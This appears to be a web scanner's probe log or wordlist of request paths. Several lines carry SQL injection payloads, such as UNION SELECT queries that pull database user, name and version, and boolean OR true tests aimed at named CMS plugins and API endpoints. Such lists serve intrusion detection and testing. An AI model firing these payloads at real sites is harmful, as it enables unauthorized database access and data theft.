/web/cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences
/web/index.php?m=member&f=login_save
/web/cgi-bin/supportInstaller
/web/?q=node&destination=node
/web/main/inc/ajax/extra_field.ajax.php?a=search_options_from_tags
/web/
/web/auth/check
/web/ajax/api/content_infraction/getIndexableContent
/web/Side.php
/web/auth/requestreset
/web/dfsms/
/web/homeaction.php
/web/module/ph_simpleblog/list?sb_category=')%20OR%20true--%20-
/web/user.php?act=login
/web/main/inc/ajax/extra_field.ajax.php?a=search_options_from_tags
/web/wp-admin/admin-ajax.php
/web/
/web/plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent="%20UNION%20SELECT%20NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),0x6e75636c65692d74656d706c617465),NULL,NULL,NULL,NULL,NULL--%20aa
/web/api/v1/repos/search?q=%27)%09UNION%09SELECT%09*%09FROM%09(SELECT%09null)%09AS%09a1%09%09JOIN%09(SELECT%091)%09as%09u%09JOIN%09(SELECT%09user())%09AS%09b1%09JOIN%09(SELECT%09user())%09AS%09b2%09JOIN%09(SELECT%09null)%09as%09a3%09%09JOIN%09(SELECT%09null)%09as%09a4%09%09JOIN%09(SELECT%09null)%09as%09a5%09%09JOIN%09(SELECT%09null)%09as%09a6%09%09JOIN%09(SELECT%09null)%09as%09a7%09%09JOIN%09(SELECT%09null)%09as%09a8%09%09JOIN%09(SELECT%09null)%09as%09a9%09JOIN%09(SELECT%09null)%09as%09a10%09JOIN%09(SELECT%09null)%09as%09a11%09JOIN%09(SELECT%09null)%09as%09a12%09JOIN%09(SELECT%09null)%09as%09a13%09%09JOIN%09(SELECT%09null)%09as%09a14%09%09JOIN%09(SELECT%09null)%09as%09a15%09%09JOIN%09(SELECT%09null)%09as%09a16%09%09JOIN%09(SELECT%09null)%09as%09a17%09%09JOIN%09(SELECT%09null)%09as%09a18%09%09JOIN%09(SELECT%09null)%09as%09a19%09%09JOIN%09(SELECT%09null)%09as%09a20%09%09JOIN%09(SELECT%09null)%09as%09a21%09%09JOIN%09(SELECT%09null)%09as%09a22%09where%09(%27%25%27=%27
/web/account/index.php
/web/action.php
/web/module/smartblog/archive?month=1&year=1&day=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,(SELECT%20MD5(55555)),NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20-
/web/http/index.php
/web/wp-content/plugins/wp-statistics/readme.txt
/web/graphql
/web/auth/newpassword
/web/scrm/crm/admin
/web/module/ph_simpleblog/list?sb_category=')%20AND%20false--%20-
/web/index.php?m=&c=AjaxPersonal&a=company_focus&company_id[0]=match&company_id[1][0]=test")
/web/'
/web/opensis/index.php
/web/index.php
